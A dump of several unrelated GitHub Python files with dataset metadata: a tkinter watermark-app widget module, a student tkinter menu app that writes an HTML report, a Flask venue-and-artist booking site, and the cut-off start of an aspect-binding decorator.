__init__(self, win, on_color_change):\n# super().__init__(win)\n \n# self.selected_color = ttkbootstrap.StringVar()\n# ttkbootstrap.Label(self, text='Color:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n \n# self.entry = ttkbootstrap.Entry(self, textvariable=self.selected_color, width=21)\n# self.entry.grid(row=0, column=1)\n# self.list_box = tk.Listbox(self, relief='flat', bg='SystemButtonFace',highlightcolor= 'SystemButtonFace', width=22, height=3)\n \n# self.list_box.bind('<>', on_color_change) \n# self.selection = 0\n# self.entry.bind('', self.move_down)\n# self.list_box.bind('', self.move_up)\n# self.list_box.bind('', self.on_return)\n# self.selected_color.trace('w', self.get_data) \n\n# def get_data(self, *args):\n# search_str = self.entry.get()\n# if search_str != '':\n# self.list_box.grid(row=2, column=1)\n# self.list_box.delete(0, END)\n# for color in COLOR_LIST:\n# if(re.match(search_str, color, re.IGNORECASE)):\n# self.list_box.insert(END, color)\n# if self.list_box.size() > 0:\n# self.should_able_arrow_keys = True\n# print(f'should_able_arrow_keys: {self.should_able_arrow_keys}')\n \n# def move_down(self, event):\n# self.list_box.focus()\n# if self.selection < (self.list_box.size() - 1):\n# self.list_box.select_clear(self.selection)\n# self.selection += 1\n# self.list_box.select_set(self.selection)\n\n# def move_up(self, event):\n# if self.selection > 0:\n# self.list_box.select_clear(self.selection)\n# self.selection -= 1\n# self.list_box.select_set(self.selection)\n\n# def on_return(self, event):\n# self.list_box.select_set(self.selection)\n# class ColorWidget3(ttkbootstrap.Frame): # Button version with showing all contents\n# \"\"\"折叠收缩格式的菜单\"\"\"\n# def __init__(self, win, on_color_change, **kwargs):\n# super().__init__(win, **kwargs)\n# self.columnconfigure(0, weight=1)\n# self.cumulative_rows = 0\n\n# # widget images\n# self.images = OPEN_COLSE_BTN_IMG\n\n# self.style = ttkbootstrap.Style()\n# self.color_group = ttkbootstrap.Frame(self, padding=(0,5,0,0))\n# for num, color in enumerate(COLOR_LIST):\n# self.style.configure(f'{color}.TButton', background=color, width=1)\n# color_btn = ttkbootstrap.Button(self.color_group, style=f'{color}.TButton', bootstyle='light-link', command=lambda color=color: on_color_change(color))\n# color_btn.grid(row=int(num/11)+1, column=num%11, padx=1,pady=1)\n \n# self.add(child=self.color_group)\n\n# def add(self, child, title=\"Color: \", initial_collapsed=True, **kwargs):\n# if child.winfo_class() != 'TFrame':\n# return\n# frm = ttkbootstrap.Frame(self)\n# frm.grid(row=self.cumulative_rows, column=0, sticky=NSEW)\n\n# ttkbootstrap.Label(frm, text=title, font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n# show_color_hex = ttkbootstrap.Label(frm, text='hex: ', foreground='gray', width=26)\n# show_color_hex.grid(row=0, column=1, padx=(0,5))\n\n# def _func(c=child): return self._toggle_open_close(c)\n# btn = ttkbootstrap.Button(frm, text='Hide', width=4, command=_func) \n# btn.grid(row=0, column=2)\n \n# child.lb = show_color_hex\n# child.btn = btn\n# child.grid(row=self.cumulative_rows + 1, column=0, sticky=NSEW)\n \n# if initial_collapsed:\n# child.grid_remove()\n# child.btn.configure(text='Show')\n# self.cumulative_rows += 2\n\n# def _toggle_open_close(self, child):\n# if child.winfo_viewable():\n# child.grid_remove()\n# child.btn.configure(text='Show')\n# else:\n# child.grid()\n# child.btn.configure(text='Hide')\nclass ColorWidget4(ttkbootstrap.Frame): # Canvas vs Scrollbar + Button version. This one is perfect\n def __init__(self, win, on_color_change, **kwargs): # on_color_change,\n super().__init__(win, **kwargs)\n self.columnconfigure(0, weight=1)\n self.cumulative_rows = 0\n\n self.color_families = COLOR_LIST\n\n self.up_arrow_img = ttkbootstrap.PhotoImage(file=OPEN_COLSE_BTN_IMG[0])\n self.right_arrow_img = ttkbootstrap.PhotoImage(file=OPEN_COLSE_BTN_IMG[1])\n\n self.base_frm = ttkbootstrap.Frame(self) # color widget base fram\n self.base_frm.grid(row=0, column=0, sticky=NSEW)\n\n ttkbootstrap.Label(self.base_frm, text='Color: ', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n frm = ttkbootstrap.Frame(self.base_frm)\n frm.grid(row=0, column=1, sticky=NSEW)\n\n self.show_color_hex = ttkbootstrap.Label(frm, text='hex: ', foreground='gray', background=self.color_families[0], width=30)\n self.show_color_hex.grid(row=0, column=1, padx=(0,5), sticky=EW)\n self.btn = Button(frm, text='', width=20, image=self.right_arrow_img, command=self.toggle_open_close) #, text='Show',image=self.images[1]\n self.btn.grid(row=0, column=2, sticky=NSEW)\n\n self.canvas = ttkbootstrap.Canvas(self.base_frm)\n self.scrollbar = ttkbootstrap.Scrollbar(self.base_frm, orient=tk.VERTICAL, command=self.canvas.yview)\n self.canvas.configure(yscrollcommand=self.scrollbar.set)\n\n self.style = ttkbootstrap.Style()\n self.color_group = ttkbootstrap.Frame(self.canvas, padding=(20,5,0,0))\n self.color_group.bind('', lambda e:self.canvas.configure(scrollregion=self.canvas.bbox('all')))\n self.canvas.create_window((0,0), window=self.color_group, anchor=NW)\n \n for num, color in enumerate(self.color_families):\n self.style.configure(f'{color}.TButton', background=color, width=1)\n color_btn = ttkbootstrap.Button(self.color_group, style=f'{color}.TButton', bootstyle='light-link', command=lambda color=color: on_color_change(color))\n color_btn.grid(row=int(num/10)+1, column=num%10, padx=1, pady=1)\n\n def toggle_open_close(self):\n if self.color_group.winfo_viewable():\n self.canvas.grid_remove()\n self.scrollbar.grid_remove()\n self.btn.configure(image=self.right_arrow_img)\n else:\n self.canvas.grid(row=1, column=0, columnspan=3, sticky=EW)\n self.scrollbar.grid(row=1, column=3, sticky=NS)\n self.btn.configure(image=self.up_arrow_img)\n\nclass SizeWidget(ttkbootstrap.Frame):\n def __init__(self, win, on_size_change):\n super().__init__(win)\n ttkbootstrap.Label(self, text='Size:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n self.selected_size = ttkbootstrap.IntVar()\n self.selected_size.set(50)\n self.scale = ttkbootstrap.Scale(self, variable=self.selected_size, from_=10, to_=200, length=260, command=lambda s:self.selected_size.set(\"%d\" % float(s)))\n self.scale.grid(row=0, column=2)\n lb = ttkbootstrap.Label(self, textvariable=self.selected_size, width=4)\n lb.grid(row=0, column=1)\n self.scale.bind('', on_size_change)\n\nclass OpacityWidget(ttkbootstrap.Frame):\n def __init__(self, win, on_opacity_change):\n super().__init__(win)\n ttkbootstrap.Label(self, text='Opacity:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n self.slider = ttkbootstrap.IntVar()\n self.slider.set(255)\n self.scale = ttkbootstrap.Scale(self, variable=self.slider, from_=0, to_=255, length=260, command=lambda s:self.slider.set(\"%d\" % float(s)))\n self.scale.grid(row=0, column=2)\n lb = ttkbootstrap.Label(self, textvariable=self.slider, width=4)\n lb.grid(row=0, column=1)\n self.scale.bind('', on_opacity_change)\n\nclass PositionWidget(ttkbootstrap.Frame):\n def __init__(self, win, watermark, on_position_set, on_position_change):\n super().__init__(win)\n self.watermark = watermark\n\n ttkbootstrap.Label(self, text='Position:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n frm = ttkbootstrap.Frame(self)\n frm.grid(row=0, column=1, sticky=NSEW)\n\n sub_frm1 = ttkbootstrap.Frame(frm)\n sub_frm1.grid(row=0, column=0, pady=5)\n\n self.var_radio = ttkbootstrap.StringVar(value=self.watermark.selected_pos)\n for num, pos in enumerate(self.watermark.positions):\n self.radio_btn = ttkbootstrap.Radiobutton(sub_frm1, text=pos, value=pos, bootstyle='danger', variable=self.var_radio, command=on_position_set)\n self.radio_btn.grid(row=num+1, column=0, pady=2, sticky=W)\n\n sub_frm2 = ttkbootstrap.Frame(frm)\n sub_frm2.grid(row=0, column=1, padx=80, sticky=E)\n direction_btns = [\n {'text': '▲', 'direction': 'up', 'row': 0, 'col':1},\n {'text': '◀', 'direction': 'left', 'row': 1, 'col':0},\n {'text': '▶', 'direction': 'right', 'row': 1, 'col':2},\n {'text': '▼', 'direction': 'down', 'row': 2, 'col':1},\n ]\n for btn in direction_btns:\n self.btn = ttkbootstrap.Button(sub_frm2, text=btn['text'], width=1, bootstyle='second-outline', command=lambda dir=btn['direction']: on_position_change(dir))\n self.btn.grid(row=btn['row'], column=btn['col'], padx=2, pady=2)\n\n# class RotationWidget1(ttkbootstrap.Frame): # changing by click button\n# \"\"\"\n# AddTextMenu:\n# self.rotation_widget = RotationWidget(self.sub_win, self.on_rotation_change)\n \n# Call Function:\n# def on_rotation_change(self, direction):\n# self.watermark.rotate(direction)\n# self.photo_box.update_watermark()\n\n# Watermark:\n# def rotate(self, direction):\n# if direction == \"left\":\n# if self.rotation == 355:\n# self.rotation = 0\n# else:\n# self.rotation += 5\n# else:\n# if self.rotation == 0:\n# self.rotation = 355\n# else:\n# self.rotation -= 5\n \n# print(self.rotation)\n# \"\"\"\n# def __init__(self, win, on_rotation_change):\n# super().__init__(win)\n# ttkbootstrap.Label(self, text='Rotation', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n# frm = ttkbootstrap.Frame(self)\n# frm.grid(row=0, column=1, padx=100, sticky=NSEW)\n# buttons = [\n# {'text': '↺', 'direction': 'left', 'row':0, 'col':1, 'padx': (0,17)},\n# {'text': '↻', 'direction': 'right', 'row':0, 'col':3, 'padx': (16,0)},\n# ]\n# for btn in buttons:\n# self.btn = ttkbootstrap.Button(frm, text=btn['text'], width=1, command=lambda dir=btn['direction']: on_rotation_change(dir))\n# self.btn.grid(row=btn['row'], column=btn['col'], padx=btn['padx'], sticky=NSEW)\nclass RotationWidget2(ttkbootstrap.Frame): # Changging by a scale\n def __init__(self, win, on_rotation_change):\n super().__init__(win)\n ttkbootstrap.Label(self, text='Rotation:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n self.slider = ttkbootstrap.IntVar()\n self.slider.set(0)\n\n self.scale = ttkbootstrap.Scale(self, variable=self.slider, from_=-355, to_=355, length=210, command=lambda s:self.slider.set('%d' % float(s)))\n self.scale.grid(row=0, column=2)\n\n self.lb = ttkbootstrap.Label(self, textvariable=self.slider, width=4)\n self.lb.grid(row=0, column=1)\n self.scale.bind('', lambda event: on_rotation_change(event, self.slider.get()))\n\n self.btn = ttkbootstrap.Button(self, text='Reset', bootstyle='second-outline', command=lambda s=0:self.slider.set(0))\n self.btn.grid(row=0, column=3)\n self.btn.bind('', lambda event: on_rotation_change(event, 0))\n\n\nclass ClearSaveWidget(ttkbootstrap.Frame):\n def __init__(self, win, clear, save):\n super().__init__(win)\n self.clear_btn = ttkbootstrap.Button(self, text='Clear', bootstyle=SECONDARY, width=8, command=clear)\n self.clear_btn.grid(row=0, column=0, padx=(0,50), sticky=NSEW)\n\n self.save = ttkbootstrap.Button(self, text='Save', bootstyle=SUCCESS, width=8 , command=save)\n self.save.grid(row=0, column=2, padx=(50,0), sticky=NSEW)\n\n\n\nif __name__ == \"__main__\":\n print(COLOR_LIST)","repo_name":"Zoe-Soen/watermark_ver1","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":23499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21745947924","text":"import webbrowser\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom datetime import date, time, datetime\nventana = Tk()\nventana.title(\"Principal\")\nventana.geometry(\"500x300\")\n\ndef fileOpen():\n ventana.fileName = filedialog.askopenfilename(filetypes=((\"Arch texto\", \".txt\"), (\"Todo\", \".\")))\n file = ventana.fileName\n return file\n\ndef datos_est():\n print(\"GERARDO JOSE CIFUENTES LUNA\")\n print(\"201900952\")\n print('Introduccion a la Programacion y Computacion 2 seccion \"E\" ')\n print(\"Ingenieria en Ciencias y Sistemas\")\n print(\"5to Semestre\")\n\ndef docu():\n webbrowser.open_new(r\"Docu\\EnsayoProyecto2_201900952.pdf\")\ndef reportweb():\n GG = open(\"menu.html\", \"w\")\n\n fase = \"\"\"\n \n \n RESTAURANTE LFP\n \n \n \n \n \n \n \n \n

Reporte de Logs

\n
\n
\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \"\"\"\n GG.write(fase)\n GG.write(\"\")\n GG.write(\"
NombreEspacios LlenosEspacios vaciosFecha-Hora
Cargar n/a n/a \"\"\"+str(datetime.now())+\"\"\"
\")\n GG.write(\"\")\n GG.write(\"\")\n GG.close()\n webbrowser.open_new_tab(\"menu.html\")\n\n\n##menu##\nbarra=Menu(ventana)\nCharge=Menu(barra)\nOper=Menu(barra)\nReprt=Menu(barra)\nHelp=Menu(barra)\n##Opciones##\nCharge.add_command(label=\"Seleccione Archivo\", command=fileOpen)\n\nOper.add_command(label=\"Rotacion Horizontal\")\nOper.add_command(label=\"Rotacion Vertical\")\nOper.add_command(label=\"Transpuesta\")\nOper.add_command(label=\"Limpiar Zona\")\nOper.add_command(label=\"Agregar linea Horizontal\")\nOper.add_command(label=\"Agregar linea Vertical\")\nOper.add_command(label=\"Agregar Rectangulo\")\nOper.add_command(label=\"Agregar Triangulo rectangulo\")\nOper.add_separator()\nOper.add_command(label=\"UNION\")\nOper.add_command(label=\"INTERSECCION\")\nOper.add_command(label=\"DIFERENCIA\")\nOper.add_command(label=\"DIFERENCIA SIMETRICA\")\n\nReprt.add_command(label=\"Abrir Reporte\", command=reportweb)\n\nHelp.add_command(label=\"Info del Estudiante\",command=datos_est)\nHelp.add_command(label=\"Documentacion\",command=docu)\n##Agregado al menu##\nbarra.add_cascade(label=\"Cargar Archivo\", menu=Charge)\nbarra.add_cascade(label=\"Operaciones\", menu=Oper)\nbarra.add_cascade(label=\"Reportes\", menu=Reprt)\nbarra.add_cascade(label=\"Ayuda\", menu=Help)\nventana.config(menu=barra)\n##BOTONES##\n\n\n\nPanel = PanedWindow(ventana, bd=4, relief=\"raised\")\nPanel.grid(row=1,column=1,columnspan=2, pady=20)\nstock=PhotoImage(file=\"Quemado.png\")\ntext = Label(Panel, text=\"Panel\", bg = \"blue\", pady=10)\ntext.pack()\ncuadro = Label(Panel, text=\"Cuadro\", bg = \"green\", padx=20,image=stock)\ncuadro.pack(side=LEFT)\nres = Label(Panel, text=\"resultado\", bg = \"black\", height=10, width=15, padx=20)\nres.pack(side=RIGHT)\n\n\n\n\nventana.mainloop()\n\n\n\n\n\n","repo_name":"Grd2-10x/IPC2Lab2_2021semestre","sub_path":"IPC2Proj2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73167896804","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for, abort\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\nfrom flask_migrate import Migrate\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\n\nmigrate = Migrate(app, db)\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\n\nclass Venue(db.Model):\n __tablename__ = 'venue'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n address = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n genres = db.Column(db.ARRAY(db.String))\n website = db.Column(db.String(120))\n seeking_talent = db.Column(db.Boolean)\n seeking_description = db.Column(db.String)\n shows = db.relationship('Show',backref='venue_shows', lazy=True,cascade=\"all, delete-orphan\", passive_deletes=True)\n\nclass Artist(db.Model):\n __tablename__ = 'artist'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n genres = db.Column(db.ARRAY(db.String))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n website = db.Column(db.String(120))\n seeking_venue = db.Column(db.Boolean)\n seeking_description = db.Column(db.String)\n shows = db.relationship('Show',backref='artist_shows', passive_deletes=True, lazy=True)\n\nclass Show(db.Model):\n __tablename__ = 'show'\n\n id = db.Column(db.Integer, primary_key=True)\n venue_id = db.Column(db.Integer,db.ForeignKey('venue.id',ondelete='CASCADE'),nullable=False)\n artist_id = db.Column(db.Integer,db.ForeignKey('artist.id',ondelete='CASCADE'),nullable=False)\n start_time = db.Column(db.DateTime)\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n\n venues = Venue.query.order_by(Venue.state, Venue.city).all()\n data = []\n areas = db.session.query(Venue.city, Venue.state).distinct()\n \n for venue in areas:\n venue = dict(zip(('city', 'state'), venue))\n venue['venues'] = []\n for venue_data in Venue.query.filter_by(city=venue['city'], state=venue['state']).all():\n shows = Show.query.filter_by(venue_id=venue_data.id).all()\n upcoming_shows = []\n for show in shows:\n if show.start_time > datetime.now():\n upcoming_shows.append({\n \"artist_id\": show.artist_id,\n \"artist_name\": Artist.query.filter_by(id=show.artist_id).first().name,\n \"artist_image_link\": Artist.query.filter_by(id=show.artist_id).first().image_link,\n \"start_time\": format_datetime(str(show.start_time))\n })\n venues_data = {\n 'id': venue_data.id,\n 'name': venue_data.name,\n 'num_upcoming_shows': len(upcoming_shows)\n }\n venue['venues'].append(venues_data)\n data.append(venue)\n return render_template('pages/venues.html', areas=data)\n\n # replace with real venues data.\n # num_shows should be aggregated based on number of upcoming shows per venue.\n # data=[{\n # \"city\": \"San Francisco\",\n # \"state\": \"CA\",\n # \"venues\": [{\n # \"id\": 1,\n # \"name\": \"The Musical Hop\",\n # \"num_upcoming_shows\": 0,\n # }, {\n # \"id\": 3,\n # \"name\": \"Park Square Live Music & Coffee\",\n # \"num_upcoming_shows\": 1,\n # }]\n # }, {\n # \"city\": \"New York\",\n # \"state\": \"NY\",\n # \"venues\": [{\n # \"id\": 2,\n # \"name\": \"The Dueling Pianos Bar\",\n # \"num_upcoming_shows\": 0,\n # }]\n # }]\n # return render_template('pages/venues.html', areas=data);\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n search_str = request.form.get('search_term')\n flash(search_str)\n venue_search = Venue.query.filter(Venue.name.ilike('%{}%'.format(search_str)))\n venue_list = list(venue_search)\n # implement search on artists with partial string search. Ensure it is case-insensitive.\n # seach for Hop should return \"The Musical Hop\".\n # search for \"Music\" should return \"The Musical Hop\" and \"Park Square Live Music & Coffee\"\n response = {\n \"count\":len(venue_list),\n \"data\": venue_list\n }\n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/venues/')\ndef show_venue(venue_id):\n venue = Venue.query.get(venue_id)\n shows = Show.query.filter_by(venue_id=venue_id).all()\n upcoming_shows = []\n past_shows = []\n for show in shows:\n if show.start_time > datetime.now():\n upcoming_shows.append({\n \"artist_id\": show.artist_id,\n \"artist_name\": Artist.query.filter_by(id=show.artist_id).first().name,\n \"artist_image_link\": Artist.query.filter_by(id=show.artist_id).first().image_link,\n \"start_time\": format_datetime(str(show.start_time))\n })\n else:\n past_shows.append({\n \"artist_id\": show.artist_id,\n \"artist_name\": Artist.query.filter_by(id=show.artist_id).first().name,\n \"artist_image_link\": Artist.query.filter_by(id=show.artist_id).first().image_link,\n \"start_time\": format_datetime(str(show.start_time))\n })\n\n data={\n \"id\": venue.id,\n \"name\": venue.name,\n \"genres\": venue.genres,\n \"address\": venue.address,\n \"city\": venue.city,\n \"state\": venue.state,\n \"phone\": venue.phone,\n \"website\": venue.website,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"seeking_description\": venue.seeking_description,\n \"image_link\": venue.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": len(past_shows),\n \"upcoming_shows_count\": len(upcoming_shows),\n }\n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n error = False\n try:\n new_venue = Venue(\n name=request.form.get('name'),\n city=request.form.get('city'),\n state=request.form.get('state'),\n address=request.form.get('address'),\n phone=request.form.get('phone'),\n image_link=request.form.get('image_link'),\n genres=request.form.getlist('genres'),\n facebook_link=request.form.get('facebook_link'),\n website=request.form.get('website'),\n seeking_talent=request.form.get('seeking_talent'),\n seeking_description=request.form.get('seeking_description')\n )\n db.session.add(new_venue)\n db.session.commit()\n\n except Exception as e:\n flash('An error occurred. Venue could not be listed.')\n flash(f'Error: {e}')\n error = True\n db.session.rollback()\n finally:\n db.session.close()\n if error:\n # do not show success page.\n return render_template('pages/home.html')\n else:\n flash('Venue ' + request.form.get('name') + ' was successfully listed!')\n return render_template('pages/home.html')\n\n@app.route('/venues/', methods=['DELETE'])\ndef delete_venue(venue_id):\n try:\n Venue.query.filter_by(id=venue_id).delete()\n db.session.commit()\n except:\n db.session.rollback()\n finally:\n db.session.close()\n return None\n \n # Complete this endpoint for taking a venue_id, and using\n # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\n\n # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\n # clicking that button delete it from the db then redirect the user to the homepage\n \n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n artists = Artist.query.order_by(Artist.name).all()\n data = []\n for artist in artists:\n artist_data = {\n \"id\": artist.id,\n \"name\": artist.name,\n }\n data.append(artist_data)\n return render_template('pages/artists.html', artists=data)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n search_str = request.form.get('search_term')\n artist_search = Artist.query.filter(Artist.name.ilike('%{}%'.format(search_str)))\n artist_list = list(artist_search)\n\n response = {\n \"count\":len(artist_list),\n \"data\": artist_list\n }\n\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/artists/')\ndef show_artist(artist_id):\n artist = Artist.query.get(artist_id)\n shows = Show.query.filter_by(artist_id=artist_id).all()\n upcoming_shows = []\n past_shows = []\n for show in shows:\n if show.start_time > datetime.now():\n upcoming_shows.append({\n \"artist_id\": show.artist_id,\n \"artist_name\": Artist.query.filter_by(id=show.artist_id).first().name,\n \"artist_image_link\": Artist.query.filter_by(id=show.artist_id).first().image_link,\n \"start_time\": format_datetime(str(show.start_time))\n })\n else:\n past_shows.append({\n \"artist_id\": show.artist_id,\n \"artist_name\": Artist.query.filter_by(id=show.artist_id).first().name,\n \"artist_image_link\": Artist.query.filter_by(id=show.artist_id).first().image_link,\n \"start_time\": format_datetime(str(show.start_time))\n })\n\n data={\n \"id\": artist.id,\n \"name\": artist.name,\n \"genres\": artist.genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"website\": artist.website,\n \"facebook_link\": artist.facebook_link,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"image_link\": artist.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": len(past_shows),\n \"upcoming_shows_count\": len(upcoming_shows),\n }\n return render_template('pages/show_artist.html', artist=data)\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists//edit', methods=['GET'])\ndef edit_artist(artist_id):\n artist = Artist.query.get(artist_id)\n form = ArtistForm(obj=artist)\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n error = False\n try:\n artist = Artist.query.get(artist_id)\n artist.name=request.form.get('name'),\n artist.city=request.form.get('city'),\n artist.state=request.form.get('state'),\n artist.phone=request.form.get('phone'),\n artist.genres=request.form.getlist('genres'),\n artist.facebook_link=request.form.get('facebook_link'),\n db.session.commit()\n\n except Exception as e:\n flash('An error occurred. Artist could not be updated.')\n flash(f'Error: {e}')\n error = True\n db.session.rollback()\n finally:\n db.session.close()\n if error:\n # do not show success page.\n return redirect(url_for('show_artist', artist_id=artist_id))\n else:\n flash('Artist ' + request.form.get('name') + ' was successfully updated!')\n return redirect(url_for('show_artist', artist_id=artist_id))\n \n \n\n@app.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n venue = Venue.query.get(venue_id)\n form = VenueForm(obj=venue)\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id): \n error = False\n try:\n venue = Venue.query.get(venue_id)\n venue.name=request.form.get('name'),\n venue.city=request.form.get('city'),\n venue.state=request.form.get('state'),\n venue.address=request.form.get('address'),\n venue.phone=request.form.get('phone'),\n venue.genres=request.form.getlist('genres'),\n venue.facebook_link=request.form.get('facebook_link'),\n db.session.commit()\n\n except Exception as e:\n flash('An error occurred. Venue could not be updated.')\n flash(f'Error: {e}')\n error = True\n db.session.rollback()\n finally:\n db.session.close()\n if error:\n # do not show success page.\n return redirect(url_for('show_venue', venue_id=venue_id))\n else:\n flash('Venue ' + request.form.get('name') + ' was successfully updated!')\n return redirect(url_for('show_venue', venue_id=venue_id))\n \n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n error = False\n try:\n \n new_artist = Artist(\n name=request.form.get('name'),\n city=request.form.get('city'),\n state=request.form.get('state'),\n phone=request.form.get('phone'),\n image_link=request.form.get('image_link'),\n genres=request.form.getlist('genres'),\n facebook_link=request.form.get('facebook_link'),\n website=request.form.get('website'),\n )\n db.session.add(new_artist)\n db.session.commit()\n\n #genres = SelectMultipleField( 'genres', validators=[DataRequired(), AnyOf(values=genres)], choices=genres )\n\n except Exception as e:\n flash('An error occurred. Artist ' + request.form.get('name') + 'could not be listed.')\n flash(f'Error: {e}')\n error = True\n db.session.rollback()\n finally:\n db.session.close()\n if error:\n # do not show success page.\n return render_template('pages/home.html')\n else:\n flash('Artist ' + request.form.get('name') + ' was successfully listed!')\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n shows = Show.query.order_by(Show.start_time).all()\n data = []\n for show in shows:\n show_data = {\n \"venue_id\": show.venue_id,\n \"venue_name\": Venue.query.filter_by(id=show.venue_id).first().name,\n \"artist_id\": show.artist_id,\n \"artist_name\": Artist.query.filter_by(id=show.artist_id).first().name,\n \"artist_image_link\": Artist.query.filter_by(id=show.artist_id).first().image_link,\n \"start_time\": format_datetime(str(show.start_time))\n }\n data.append(show_data)\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n error = False\n try:\n new_show = Show(\n artist_id=request.form.get('artist_id'),\n venue_id=request.form.get('venue_id'),\n start_time=request.form.get('start_time'),\n )\n db.session.add(new_show)\n db.session.commit()\n\n except Exception as e:\n flash(f'An error occurred. Show could not be listed. Error: {e}')\n error = True\n db.session.rollback()\n finally:\n db.session.close()\n if error:\n # do not show success page.\n return render_template('pages/home.html')\n else:\n flash('Show was successfully listed!')\n return render_template('pages/home.html')\n\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","repo_name":"FlixKo/Fyyur","sub_path":"starter_code/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42105428130","text":"\"\"\"\nRename to explicit-python-aspect\nexplicit-pyspect\nexpyspect\n\"\"\"\nimport inspect\n\nfrom aspect.advices import AdviceType, get_class_advice_methods\n\n\ndef bind(target_bind_cls):\n def decorator(source_bind_cls):\n before_target_methods = dict(get_class_advice_methods(target_bind_cls, AdviceType.BEFORE))\n after_target_methods = dict(get_class_advice_methods(target_bind_cls, AdviceType.AFTER))\n\n source_methods = dict(inspect.getmembers(source_bind_cls, predicate=inspect.isfunction))\n\n for method_name in source_methods:\n if (method_name in before_target_methods) or (method_name in after_target_methods):\n def decorated_method(*args, **kwargs):\n 